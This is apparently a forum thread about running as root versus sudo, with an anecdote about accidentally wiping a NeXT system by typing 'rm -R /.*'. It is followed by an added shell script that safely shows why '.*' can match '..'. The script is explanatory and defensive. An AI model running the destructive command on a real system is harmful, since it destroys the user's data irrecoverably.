The debate at hand is whether to have them always being root for everything all the time without even logging in, or being a normal user and have apps that need root privileges run sudo in the background. Of course sudo lets you be root, for single commands as needed. Beats the fuck out of leaving these inexperienced users just running as root all the time doesn't it? You aren't just wildly off track, you are completely and hopelessly lost.
I hear Ubuntu praised a lot for its approach, but it doesn't really do much to discourage users from running shell commands as root. Every user has access to the "Root Terminal" application, right in the Gnome menus. All it takes is your password (that's your own password, assuming you were the default user created during install, because that user is automatically placed on the sudo list) and you're free to do whatever you want as root. Get into lazy habits (i.e. choosing "Root Terminal" instead of the regular terminal when you want to do system maintenance tasks that might require root privileges) and the supposed no-root-account protections of Ubuntu are out the window.
Breakfast served all day!
/., once again proving the hypothesis that the best way to get a lot of information is to say something wrong on the internet.
Thanks, all : )
Case in point, I set my wife up as a LUA user on our Windows XP box at home and she still hasn't noticed any difference.
"You can now flame me, I am full of love,"
On a NeXT machine. The NeXT desktop was dropping .desktop and other hidden files and directories all over the place and it had left some in root that I wanted to get rid of. Since they were directories and there was nothing else starting with dot, I typed "rm -R /.*". Stopped it after I noticed it was still churning after a minute, but by then the system was trashed.
The answer is that
1. hitting Ctrl-C stops it, but what is gone is gone (I don't know about restoring from inodes or whatever), and
2. how much you lose, and what gets lost depends on how quickly you realise, and what you have placed in that directory.
The problem is that you are never really sure what got lost! What did I have in that root directory? Didn't I put something important there 3 months ago when I was doing ... ? Luckily, I kept backups :( .
I have done this. It is all too easy, even if you are consistently careful.
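What the shell actually hands to rm for a pattern like /.*, as an added example that is not part of this thread: the directory and its dotfiles are constructed, the functions only list names, and the only thing removed is that temporary directory at the end. The pattern pair '.[!.]* ..?*' is the usual portable idiom for "dotfiles but never . or ..", not something from the thread.

```shell
#!/bin/sh
# Added example, not from the thread: what the shell turns ".*" into, which is why
# "rm -R /.*" did so much more than remove the dotfiles in /. Nothing here is deleted
# except the constructed temporary directory at the end; the functions only list names.

# Constructed sample directory: two dotfiles, one dot-directory, one plain file.
make_dir() {
    d=$(mktemp -d) || return 1
    : > "$d/.hidden1"
    : > "$d/.hidden2"
    mkdir "$d/.dotdir"
    : > "$d/visible"
    printf '%s\n' "$d"
}

# Expand the pattern(s) in "$2" from inside directory "$1" and print the names that
# actually exist, sorted. The pattern is handed over as a string so that the shell
# only expands it once we are in "$1" (the unquoted $2 is split, then globbed).
expand_in() {
    ( cd "$1" || exit 1
      set -- $2
      for w in "$@"; do
          [ -e "$w" ] && printf '%s\n' "$w"
      done | sort )
}

# True when the expansion reaches "..": that is the catastrophe in "rm -R /.*",
# because "/.." is "/" itself, so the recursion starts at the filesystem root.
hits_parent() {
    expand_in "$1" "$2" | grep -qx '\.\.'
}

# Stand-alone demonstration. Whether ".*" includes "." and ".." depends on the shell:
# dash and bash before 5.2 include them; bash 5.2+ skips them by default (globskipdots).
# The pattern pair '.[!.]* ..?*' lists dotfiles without ever matching "." or "..".
D=$(make_dir)
printf '.*          -> %s\n' "$(expand_in "$D" '.*' | tr '\n' ' ')"
printf '.[!.]* ..?* -> %s\n' "$(expand_in "$D" '.[!.]* ..?*' | tr '\n' ' ')"
if hits_parent "$D" '.*'; then
    echo 'this shell puts ".." in .*: "rm -R /.*" would start at / itself'
else
    echo 'this shell skips "." and ".." in .*; dash and older bash do not'
fi
rm -rf -- "$D"
```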